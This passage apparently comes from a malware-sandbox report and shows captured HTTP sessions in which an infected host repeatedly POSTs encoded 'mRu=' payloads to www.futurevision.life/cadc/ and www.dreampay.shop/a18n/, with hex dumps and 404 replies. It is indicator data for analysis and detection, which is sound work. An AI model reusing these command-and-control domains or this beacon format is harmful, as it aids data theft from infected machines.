                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 6b 70 31 48 34 74 50 75 33 59 45 4c 65 50 30 6d 33 55 46 33 71 62 53 6a 4e 57 6e 59 39 4c 39 44 44 70 58 32 6f 64 41 6f 4a 78 73 79 63 79 55 68 52 7a 63 36 68 46 4d 61 37 58 71 47 47 36 68 41 48 6c 49 6d 49 71 65 62 52 6d 62 4b 6b 77 46 75 6c 50 69 46 57 57 35 30 7a 68 62 78 58 49 63 4e 58 2b 50 75 34 48 61 45 6b 5a 32 4f 2b 37 76 50 65 6f 59 50 46 59 61 6c 33 69 39 56 35 4d 2f 6d 61 57 32 72 70 74 77 32 39 61 52 43 54 77 54 71 45 78 42 2b 2f 61 4f 76 53 33 2b 50 6a 46 4d 32 65 6f 54 49 37 50 43 55 39 76 63 7a 45 34 48 79 57 52 42 31 41 3d 3d
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdkp1H4tPu3YELeP0m3UF3qbSjNWnY9L9DDpX2odAoJxsycyUhRzc6hFMa7XqGG6hAHlImIqebRmbKkwFulPiFWW50zhbxXIcNX+Pu4HaEkZ2O+7vPeoYPFYal3i9V5M/maW2rptw29aRCTwTqExB+/aOvS3+PjFM2eoTI7PCU9vczE4HyWRB1A==
                                                                                                                            Nov 12, 2024 15:34:38.124049902 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:38 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            79192.168.11.2049798203.161.49.19380
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:40.654345036 CET782OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 2f 39 44 69 5a 58 6e 61 31 41 72 4a 78 73 6d 4d 79 52 73 78 7a 62 36 68 49 7a 61 2b 76 71 47 47 75 68 41 47 56 49 6d 59 57 52 62 42 6d 5a 66 55 77 48 67 46 50 69 46 57 57 35 30 79 46 39 78 58 77 63 4e 6e 75 50 38 4b 76 56 48 6b 5a 35 65 75 37 76 4c 65 6f 55 50 46 59 38 6c 31 58 61 56 37 45 2f 6d 66 71 32 6f 38 42 33 38 39 62 59 50 7a 78 45 6b 6e 6f 4a 79 37 36 47 35 79 48 4f 44 52 4e 62 7a 49 6c 4a 56 4a 37 6d 58 75 7a 75 33 30 42 76 77 55 51 61 6f 46 68 41 51 4b 61 6d 73 72 52 31 71 78 4b 6f 58 35 62 39 53 5a 6f 3d
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZP/9DiZXna1ArJxsmMyRsxzb6hIza+vqGGuhAGVImYWRbBmZfUwHgFPiFWW50yF9xXwcNnuP8KvVHkZ5eu7vLeoUPFY8l1XaV7E/mfq2o8B389bYPzxEknoJy76G5yHODRNbzIlJVJ7mXuzu30BvwUQaoFhAQKamsrR1qxKoX5b9SZo=
                                                                                                                            Nov 12, 2024 15:34:40.832247972 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:40 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            80192.168.11.2049799203.161.49.19380
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:43.361594915 CET5156OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 48 39 44 52 42 58 32 4d 39 41 71 4a 78 73 6c 4d 79 51 73 78 79 48 36 68 51 2f 61 2b 71 49 47 43 65 68 41 6b 4e 49 79 37 4f 52 55 42 6d 5a 64 55 77 45 75 6c 4f 67 46 51 32 31 30 79 56 39 78 58 77 63 4e 68 71 50 73 49 48 56 4c 45 5a 32 4f 2b 37 64 50 65 70 39 50 46 41 43 6c 31 53 74 55 50 49 2f 6d 37 32 32 34 61 56 33 30 39 62 57 49 7a 78 4d 6b 6e 55 47 79 2f 61 38 35 79 79 68 44 53 39 62 2f 4d 4d 71 50 61 2f 67 42 4d 33 56 33 6b 56 72 79 45 77 4f 32 58 70 2f 62 4d 4f 59 75 62 78 37 6b 54 57 35 49 37 57 37 4d 5a 42 7a 73 58 73 79 41 6d 6e 77 65 68 78 56 55 52 73 71 78 64 4f 32 32 36 6c 31 31 45 4d 5a 34 49 38 39 74 4a 65 37 57 73 4d 4d 76 70 65 5a 49 67 55 76 39 56 36 47 65 4a 79 43 4f 44 4d 7a 34 66 67 32 74 4c 73 51 2b 32 39 38 5a 67 79 63 2b 41 50 53 34 36 58 41 77 67 51 59 4e 59 70 6c 46 57 2b 6b 6f 58 74 42 61 48 74 49 69 55 57 34 7a 49 75 75 45 35 56 4d 6e 67 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZPH9DRBX2M9AqJxslMyQsxyH6hQ/a+qIGCehAkNIy7ORUBmZdUwEulOgFQ210yV9xXwcNhqPsIHVLEZ2O+7dPep9PFACl1StUPI/m7224aV309bWIzxMknUGy/a85yyhDS9b/MMqPa/gBM3V3kVryEwO2Xp/bMOYubx7kTW5I7W7MZBzsXsyAmnwehxVURsqxdO226l11EMZ4I89tJe7WsMMvpeZIgUv9V6GeJyCODMz4fg2tLsQ+298Zgyc+APS46XAwgQYNYplFW+koXtBaHtIiUW4zIuuE5VMng8wWQY/wcbf9YFQmdUbndFDrUyM+60QP4VlzeoN+FAZuY8aFywo3590bnv+ztbRp3N6Mg9X3pyBgr/ofeyh3owJXE66WfoL4LEBifKcv5USdxK6sCeYoqH2VqWJaDCHnKIWa1GSO6a5ljnRrhsJ+ElnSXcYpmwSWKQ6xdEGsZA0OS4xhmXJLqZNtGyYeVRzKNMHYRvJgbpD27k/YH23Ix5g9H3HbrdLMuNN/xJWZ3e1p1Alc+lcSINWeJ+uUu7Ucgdo9knqoBoc+/9EbRP0SBa4F2n2cSUZ8qOSqSl6SPaOq5ypjIHgN2RH6QCrxaCG4pBPD3lWXPO0RyfPB2vkWx2IQsDfeOji7VVqiBBjc7P8IaiGCAnptc4o6N+rbyIuHgamd7R2WwJGJm9YmgFSkrKLC0iSphOtJ0WLI5m57sl/Y2AAWBC7ZOuFv5jUP4mdjZ7H7YEwHIw/evOZpP8px23KzlYEren73r13u26rgM6bvbbxu6HXPcRbjEsEWobqGnxxtCyYCd2q/gM5HVSoYyvSnTnPhO91WCXMk82b07MjFIFLGAAFtCcoBHdgNvQoIWEm9EUzDOi5/2kNAIaIwsGrMtP91MVy8fuBxXicuFqBVxhl/vnFaOw3l5V/aqbHp2SJCv+GisuEXp/KQaDz9VylIAeuY0z+GP8d [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:34:43.361666918 CET2775OUTData Raw: 41 2f 57 44 39 42 39 4f 4d 6b 6f 69 50 76 78 38 48 45 51 53 52 30 69 41 2f 53 2b 37 4f 58 4c 52 76 55 37 77 6e 4e 59 52 50 6e 37 67 41 45 66 4f 65 73 6f 74 57 72 51 71 58 49 45 36 57 6a 41 38 35 54 7a 56 73 2f 50 6e 49 62 62 31 53 73 69 39 6e 4a
                                                                                                                            Data Ascii: A/WD9B9OMkoiPvx8HEQSR0iA/S+7OXLRvU7wnNYRPn7gAEfOesotWrQqXIE6WjA85TzVs/PnIbb1Ssi9nJK49xx5sfmsuWLFDfUeDEpiWSxN5aK4VUeW0ZLlDKLOaue5oRCGWquOOlqelnTlc9tELENbkHXH2Rrzt4dHBdKvxVG5UQVt1/Qqz+6ciavKomGJX4q1vaimsjcyB9aJAqfPpV3kL6DHbqvHsdQ96WEO75j/LGSmKzC
                                                                                                                            Nov 12, 2024 15:34:43.554152966 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:43 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            81192.168.11.2049800203.161.49.19380
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:46.076700926 CET480OUTGET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:34:46.269095898 CET548INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:46 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            82192.168.11.204980113.248.169.4880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:51.425786018 CET750OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 54 38 41 75 72 4e 34 48 57 6e 4d 6b 78 36 4e 35 4a 74 32 55 32 67 33 47 63 76 55 43 68 49 75 48 50 32 37 51 6f 6b 63 4d 47 4c 38 58 50 45 64 70 69 58 35 77 5a 52 4a 49 6e 37 31 4b 4d 69 65 6e 6f 54 4a 65 36 61 48 72 74 75 46 43 63 75 4f 7a 61 77 56 30 38 66 35 78 44 53 41 65 4b 59 4f 33 64 79 4b 71 75 4c 55 30 51 4f 6d 76 6f 69 4a 41 36 66 78 61 45 30 2b 68 61 56 47 48 44 75 57 74 4a 57 30 42 4a 59 48 70 41 70 51 67 43 58 50 32 39 44 62 4b 49 68 58 70 79 48 30 44 6a 36 79 4c 41 32 4e 64 35 30 43 76 36 62 6b 44 37 54 52 68 55 45 2f 74 73 51 3d 3d
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlaT8AurN4HWnMkx6N5Jt2U2g3GcvUChIuHP27QokcMGL8XPEdpiX5wZRJIn71KMienoTJe6aHrtuFCcuOzawV08f5xDSAeKYO3dyKquLU0QOmvoiJA6fxaE0+haVGHDuWtJW0BJYHpApQgCXP29DbKIhXpyH0Dj6yLA2Nd50Cv6bkD7TRhUE/tsQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            83192.168.11.204980213.248.169.4880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:54.096358061 CET770OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 47 48 49 55 54 51 72 6c 63 4d 42 4c 38 58 58 55 64 6f 6d 58 35 37 5a 52 30 39 6e 2b 56 4b 4d 6d 2b 6e 6f 58 4e 65 36 74 72 6f 72 2b 46 41 58 4f 4f 4c 56 51 56 30 38 66 35 78 44 53 45 30 4b 59 47 33 64 42 43 71 38 35 38 33 54 4f 6d 75 76 69 4a 41 72 50 77 52 45 30 2f 4d 61 58 2b 68 44 74 75 74 4a 55 73 42 48 71 6a 75 50 70 51 6d 47 58 50 6b 39 52 6e 47 50 51 76 64 33 52 34 2f 75 71 6d 72 46 67 41 48 6b 47 32 4c 35 49 34 78 2f 6a 6f 4a 57 47 2b 32 78 66 70 31 31 6b 35 58 45 68 56 4d 43 59 6d 4d 56 47 71 50 68 66 45 3d
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg+GHIUTQrlcMBL8XXUdomX57ZR09n+VKMm+noXNe6tror+FAXOOLVQV08f5xDSE0KYG3dBCq8583TOmuviJArPwRE0/MaX+hDtutJUsBHqjuPpQmGXPk9RnGPQvd3R4/uqmrFgAHkG2L5I4x/joJWG+2xfp11k5XEhVMCYmMVGqPhfE=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            84192.168.11.204980313.248.169.4880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:56.777841091 CET2578OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 2b 48 50 6e 72 51 74 32 6b 4d 41 4c 38 58 4a 45 64 6c 6d 58 35 6d 5a 52 73 35 6e 2b 4a 38 4d 67 79 6e 70 79 5a 65 38 59 66 6f 69 2b 46 41 59 75 4f 77 61 77 56 62 38 66 70 4c 44 53 30 30 4b 59 47 33 64 48 6d 71 2f 72 55 33 56 4f 6d 76 6f 69 4a 4d 36 66 78 32 45 30 6d 35 61 58 37 63 43 63 4f 74 49 30 38 42 4b 35 48 75 47 70 51 6b 4c 33 4f 33 39 52 71 59 50 54 62 37 33 55 74 59 75 72 2b 72 4a 56 6c 44 37 47 2f 53 6d 6f 41 50 35 43 49 57 42 45 75 78 30 73 52 55 6c 6b 78 35 50 55 52 35 4e 49 6e 45 49 56 75 50 30 4b 2f 43 61 54 34 50 75 44 6b 4f 45 64 70 63 45 33 42 42 32 32 47 46 31 45 68 55 4d 6f 72 56 56 39 64 6e 6c 78 6f 38 70 50 43 6c 72 75 78 4b 6e 38 77 74 4a 56 33 73 5a 45 75 2b 4a 33 31 63 36 77 45 78 2b 2b 66 78 63 6a 48 4e 68 34 70 51 30 71 2b 56 44 57 51 2b 70 6b 75 2b 2b 74 4b 51 30 6f 63 38 52 4f 58 53 65 67 50 53 43 6b 68 63 68 78 5a 46 2b 6a 65 4c 6c 59 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg++HPnrQt2kMAL8XJEdlmX5mZRs5n+J8MgynpyZe8Yfoi+FAYuOwawVb8fpLDS00KYG3dHmq/rU3VOmvoiJM6fx2E0m5aX7cCcOtI08BK5HuGpQkL3O39RqYPTb73UtYur+rJVlD7G/SmoAP5CIWBEux0sRUlkx5PUR5NInEIVuP0K/CaT4PuDkOEdpcE3BB22GF1EhUMorVV9dnlxo8pPClruxKn8wtJV3sZEu+J31c6wEx++fxcjHNh4pQ0q+VDWQ+pku++tKQ0oc8ROXSegPSCkhchxZF+jeLlYFkE314KeBwgTw1NOT5T9zvzkGlQroOUN3ee6cieFHT85YMug3OUfUXBDsHTYiAFmNOFFJpaLN9IFQTwRa340/W9jqIYy6SByu3X+B1tRKFLTsgYBEpIWsCT3KYGb4lTfQoJTXngHmasIPabPQn2oVQJll2H0XpS2ZCnPKxLtRB8YzFP3Sg5anPbjPKWktICB4ZbXL77MQB0m1aHQ3u6pOzdl2614XHW69H5WodGlOob2LHLJEHxvAaeOKgoNoVcRKvD0qYl48AGsJ+ophGGMDu5TMpqQ8WfCIdzImuiOutbdIsTZyyEJz4/Ubf2QU4zAp7W2tPE9vEXXWt2CrCzcJlAY/elsmlFi+/eK9LffHQDolwgDRpLVWL4Ceu4UEX79HSupVmO8yCPHtVIek16K3fmglkTJdOeC3Hs1cg5mxKxogXEuEIcaFwHq/JxrD0vE4QCZD894E08Z72nuqzTVI7ujItaurk63QB3FXwoNBEzODBML/l8pzliFibj1UfsmjqSSb1/58/rVEx7blWlH73tF9AO+F0RpHEkaTaAt4MEbz2tOzUGwewNxqjStgA1yF2COfjDkl0Kbi02fHhwNl5bq+vdC2oftE8IwOTD3qVwNvN0BbDBwMNQolnBTBm4zpzZC5fRlLCGOwjmQOLvZe2n61P3p2LJ6IU [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:34:56.777877092 CET5341OUTData Raw: 75 53 44 71 73 71 78 38 6a 6f 68 56 56 37 73 69 57 56 66 58 42 39 37 2f 30 39 73 65 2b 4e 43 52 4e 67 6b 53 6e 55 55 33 57 75 62 68 76 44 59 77 4d 70 66 53 63 64 2f 34 69 79 6d 45 75 76 61 47 57 38 62 38 71 58 65 63 56 59 65 41 75 34 46 35 7a 37
